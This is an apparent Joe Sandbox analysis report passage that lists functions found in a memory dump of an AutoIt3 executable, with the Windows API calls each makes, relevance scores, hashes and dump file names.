                                      • Opcode ID: 2c0005f3eb7735d19275bde3bb5e87c40ea309c8b816a7ad69ca2f78fd948b93
                                      • Instruction ID: 48049a115d85d5bd01e9eace82a774f5bad2688dc8824c05de2d47a364fca2a6
                                      • Opcode Fuzzy Hash: 2c0005f3eb7735d19275bde3bb5e87c40ea309c8b816a7ad69ca2f78fd948b93
                                      • Instruction Fuzzy Hash: C5B18C79900249DBDF50CFA8C9847EDB7B1FF48314F148129ED59EB294DB70AA50CBA4
                                      Function 00866A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memmove$__itow__swprintf
                                      • String ID:
                                      • API String ID: 3253778849-0
                                      • Opcode ID: 4cd205410e57b1cfe4770abb86cb8707d9e595a90c2a94046b2e1526cc5d573e
                                      • Instruction ID: 06599be231952225cb216b68349f3990492b0ffa6f8d55f176b85f8c71f1e7f9
                                      • Opcode Fuzzy Hash: 4cd205410e57b1cfe4770abb86cb8707d9e595a90c2a94046b2e1526cc5d573e
                                      • Instruction Fuzzy Hash: E861A970500A9AABCF11EF68CC86EFE37A8FF05308F054558F955EB192EB309955CB52
                                      Function 00880844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0088147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0088040D,?,?), ref: 00881491
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0088091D
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0088095D
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00880980
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008809A9
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008809EC
                                      • RegCloseKey.ADVAPI32(00000000), ref: 008809F9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                      • String ID:
                                      • API String ID: 4046560759-0
                                      • Opcode ID: ecaf2eb5c63f3a8d521792504256ce7cdb73bc3c74e1247fcd7ccebd84f098ae
                                      • Instruction ID: 66e952b09e638514ce842c15355d8582ff6f5156343e4489fc7a05176ea26bc6
                                      • Opcode Fuzzy Hash: ecaf2eb5c63f3a8d521792504256ce7cdb73bc3c74e1247fcd7ccebd84f098ae
                                      • Instruction Fuzzy Hash: 79515831208204AFDB54EF68CC85E6ABBA9FF84314F04491DF595C72A2DB31E949CF92
                                      Function 00885DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenu.USER32(?), ref: 00885E38
                                      • GetMenuItemCount.USER32(00000000), ref: 00885E6F
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00885E97
                                      • GetMenuItemID.USER32(?,?), ref: 00885F06
                                      • GetSubMenu.USER32(?,?), ref: 00885F14
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00885F65
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostString
                                      • String ID:
                                      • API String ID: 650687236-0
                                      • Opcode ID: bc72a047feb25e304b5bf1a63c1c11a9003f4799fbb6b35eee08a928e8f120cf
                                      • Instruction ID: 7ced1ab8a17b510d5731f38d83db8ffec71aaa1c2bdd1d5cf3c6818e4b6344c3
                                      • Opcode Fuzzy Hash: bc72a047feb25e304b5bf1a63c1c11a9003f4799fbb6b35eee08a928e8f120cf
                                      • Instruction Fuzzy Hash: F3516B75A01A29AFDB11EF68C845AAEB7B5FF48310F154059E911FB391CB30AE418F92
                                      Function 0085F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0085F6A2
                                      • VariantClear.OLEAUT32(00000013), ref: 0085F714
                                      • VariantClear.OLEAUT32(00000000), ref: 0085F76F
                                      • _memmove.LIBCMT ref: 0085F799
                                      • VariantClear.OLEAUT32(?), ref: 0085F7E6
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0085F814
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                      • String ID:
                                      • API String ID: 1101466143-0
                                      • Opcode ID: e98f361c50085659d58ee63d5c8365b567e504bd9bcefd341e0cd984c5897521
                                      • Instruction ID: 902182d2ed5e828dc6b4ee7c3c586cba4478659bfd645fb7bf7b9cf3a1fbfb93
                                      • Opcode Fuzzy Hash: e98f361c50085659d58ee63d5c8365b567e504bd9bcefd341e0cd984c5897521
                                      • Instruction Fuzzy Hash: AD515AB5A00209EFDB14CF58C884AAAB7B8FF4C354B15856AEE59DB301D730E955CFA0
                                      Function 008629B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 008629FF
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862A4A
                                      • IsMenu.USER32(00000000), ref: 00862A6A
                                      • CreatePopupMenu.USER32 ref: 00862A9E
                                      • GetMenuItemCount.USER32(000000FF), ref: 00862AFC
                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00862B2D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                      • String ID:
                                      • API String ID: 3311875123-0
                                      • Opcode ID: c786906c51c17881ca61f6c447681112c37db5d237bc77aa9acfa1feca24a715
                                      • Instruction ID: 8efa4ccd15c2b24d94f1b09e4d2a3f7753217619c9a8e8bfed16b4d9edd8ac11
                                      • Opcode Fuzzy Hash: c786906c51c17881ca61f6c447681112c37db5d237bc77aa9acfa1feca24a715
                                      • Instruction Fuzzy Hash: 1251B070600A59DFCF25CFA8D888BAEBBF4FF44324F154199E811E7291D7B09944CB51
                                      Function 00801B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00801B76
                                      • GetWindowRect.USER32(?,?), ref: 00801BDA
                                      • ScreenToClient.USER32(?,?), ref: 00801BF7
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00801C08
                                      • EndPaint.USER32(?,?), ref: 00801C52
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                      • String ID:
                                      • API String ID: 1827037458-0
                                      • Opcode ID: f3c8132030bd3c15c9ff550648948e86c9b343bdbe087108fe8a54dea60611f2
                                      • Instruction ID: 2d0af0ef7ef03c2f5953557bdef5aa0ccb54a260549f3037b52646155238aacc
                                      • Opcode Fuzzy Hash: f3c8132030bd3c15c9ff550648948e86c9b343bdbe087108fe8a54dea60611f2
                                      • Instruction Fuzzy Hash: 4E415A71104304AFDB11DF28CC88FAA7BF8FB55774F140669FAA5C62A1C7319845DB62
                                      Function 0088BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(008C77B0,00000000,00EA5FF8,?,?,008C77B0,?,0088BC1A,?,?), ref: 0088BD84
                                      • EnableWindow.USER32(00000000,00000000), ref: 0088BDA8
                                      • ShowWindow.USER32(008C77B0,00000000,00EA5FF8,?,?,008C77B0,?,0088BC1A,?,?), ref: 0088BE08
                                      • ShowWindow.USER32(00000000,00000004,?,0088BC1A,?,?), ref: 0088BE1A
                                      • EnableWindow.USER32(00000000,00000001), ref: 0088BE3E
                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0088BE61
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: e624cbdf7f5112cad173198250f31f02ef9033329671a6c6730b913ecf88892a
                                      • Instruction ID: 1a12ca95f7cf3c0ae4228e1557df143611c409a0f80cb2dd9e26719fdd0dc97a
                                      • Opcode Fuzzy Hash: e624cbdf7f5112cad173198250f31f02ef9033329671a6c6730b913ecf88892a
                                      • Instruction Fuzzy Hash: F3416C34600645BFDB22EF28C589BD57BE1FF85314F1841A9EA58CF6A2C731AC45CB51
                                      Function 00877788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,0087550C,?,?,00000000,00000001), ref: 00877796
                                        • Part of subcall function 0087406C: GetWindowRect.USER32(?,?), ref: 0087407F
                                      • GetDesktopWindow.USER32 ref: 008777C0
                                      • GetWindowRect.USER32(00000000), ref: 008777C7
                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 008777F9
                                        • Part of subcall function 008657FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865877
                                      • GetCursorPos.USER32(?), ref: 00877825
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00877883
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                      • String ID:
                                      • API String ID: 4137160315-0
                                      • Opcode ID: 1276df9f121dd01f7657a5f5733e190e9315cbfaedf23cbbd55015789728b094
                                      • Instruction ID: 3763c6a0b70c9afa5cb7d2eaba363f46c6217327f8d50aa34bd89617fdf5a1ab
                                      • Opcode Fuzzy Hash: 1276df9f121dd01f7657a5f5733e190e9315cbfaedf23cbbd55015789728b094
                                      • Instruction Fuzzy Hash: 3231B072508305AFD720EF54D849F9BB7A9FF88314F00492AF599E7191CB30E918CBA6
                                      Function 03CFE300 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 03CFE32E
                                      • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 03CFE38D
                                      • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 03CFE3AB
                                      • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 03CFE3BF
                                      • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 03CFE3DF
                                      • ReleaseDC.USER32(00000000,?), ref: 03CFE3F7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EntriesPaletteSystem$Release
                                      • String ID:
                                      • API String ID: 118965383-0
                                      • Opcode ID: f50c1d7664304cfcfcb17974dbe81d20cae5a3c12cfd11c14971bc39639b14c8
                                      • Instruction ID: 324cad7b22584697a30ff93dc4d7962900ebee146c00d9e2b3f759e8eb5b5884
                                      • Opcode Fuzzy Hash: f50c1d7664304cfcfcb17974dbe81d20cae5a3c12cfd11c14971bc39639b14c8
                                      • Instruction Fuzzy Hash: 1521B2B5A10348BFDB50DBA4CE85FAE73ACEB08B00F4104A5FB04EB180D6749F549B21
                                      Function 00859431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00858CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00858CDE
                                        • Part of subcall function 00858CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00858CE8
                                        • Part of subcall function 00858CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00858CF7
                                        • Part of subcall function 00858CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00858CFE
                                        • Part of subcall function 00858CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00858D14
                                      • GetLengthSid.ADVAPI32(?,00000000,0085904D), ref: 00859482
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0085948E
                                      • HeapAlloc.KERNEL32(00000000), ref: 00859495
                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 008594AE
                                      • GetProcessHeap.KERNEL32(00000000,00000000,0085904D), ref: 008594C2
                                      • HeapFree.KERNEL32(00000000), ref: 008594C9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                      • String ID:
                                      • API String ID: 3008561057-0
                                      • Opcode ID: 411abfa6013ed0ab6baf09697c254ed750f742917a5e7ba0c7e8ed82b6bc96ec
                                      • Instruction ID: e0dad7fae514fe81305be27590a77ae79ff817b6bbb7a2e6a6603f1818e152fe
                                      • Opcode Fuzzy Hash: 411abfa6013ed0ab6baf09697c254ed750f742917a5e7ba0c7e8ed82b6bc96ec
                                      • Instruction Fuzzy Hash: D311AC32501604EFDF10AFA4CC09BAE7BAAFF45316F14801AEC85D7210C7369D0ACB64
                                      Function 008591CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00859200
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00859207
                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00859216
                                      • CloseHandle.KERNEL32(00000004), ref: 00859221
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00859250
                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00859264
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 1413079979-0
                                      • Opcode ID: 91963fb31a23ee61db577d22a25c46a08ffb309bd7b31fb2baa2e8b0fba731f7
                                      • Instruction ID: 3265fc0427e7dc6d3b0e8d3480df02099a1b0e92c615a5fe52aeadd8c0ab6a06
                                      • Opcode Fuzzy Hash: 91963fb31a23ee61db577d22a25c46a08ffb309bd7b31fb2baa2e8b0fba731f7
                                      • Instruction Fuzzy Hash: 9A11477250120EFFDF019FA4ED49BDA7BA9FB08305F084015FE44A2160C3769D64EB60
                                      Function 0085C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0085C34E
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0085C35F
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0085C366
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0085C36E
                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0085C385
                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0085C397
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 0ba5907e3adca8a32509baaed706b8e1aebb5b77728081c77272883dffb92c7d
                                      • Instruction ID: f78996b71f138b3c067ec28c1f1a29eaacc679d5ceea26dbb22cbf959a0661d0
                                      • Opcode Fuzzy Hash: 0ba5907e3adca8a32509baaed706b8e1aebb5b77728081c77272883dffb92c7d
                                      • Instruction Fuzzy Hash: 97012175E00318BFEB10ABA59C49A5ABFB8FF58751F044066FE04E7280D6709910CFA1
                                      Function 0088C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008016CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00801729
                                        • Part of subcall function 008016CF: SelectObject.GDI32(?,00000000), ref: 00801738
                                        • Part of subcall function 008016CF: BeginPath.GDI32(?), ref: 0080174F
                                        • Part of subcall function 008016CF: SelectObject.GDI32(?,00000000), ref: 00801778
                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0088C57C
                                      • LineTo.GDI32(00000000,00000003,?), ref: 0088C590
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0088C59E
                                      • LineTo.GDI32(00000000,00000000,?), ref: 0088C5AE
                                      • EndPath.GDI32(00000000), ref: 0088C5BE
                                      • StrokePath.GDI32(00000000), ref: 0088C5CE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: 8185fc4e21ad0963b0ad391cc5fedb70a6aa9ac6ce02d64757418268fa8ceb11
                                      • Instruction ID: aaefa02529cb673e99c26f973131220cd25ecf6b9fff6f7e6931f77d60f95e50
                                      • Opcode Fuzzy Hash: 8185fc4e21ad0963b0ad391cc5fedb70a6aa9ac6ce02d64757418268fa8ceb11
                                      • Instruction Fuzzy Hash: B011C97600010DBFDF12AF94DC88EAA7FADFB08354F048062BA199A161D771AE55DFA0
                                      Function 008207BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008207EC
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 008207F4
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008207FF
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0082080A
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00820812
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0082081A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: c2461c0f2d6b18f997d814954be0cae9c0153d1cfb858006616afea04c59e8ef
                                      • Instruction ID: 8eb747f304c180733398a1045ab7cfa6bd8055364a6c554bf83470f73e97091f
                                      • Opcode Fuzzy Hash: c2461c0f2d6b18f997d814954be0cae9c0153d1cfb858006616afea04c59e8ef
                                      • Instruction Fuzzy Hash: CC0148B09017597DE3009F5A8C85A52FEA8FF59354F04411BA15847941C7B5A864CBE5
                                      Function 008659A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008659B4
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008659CA
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 008659D9
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008659E8
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008659F2
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008659F9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
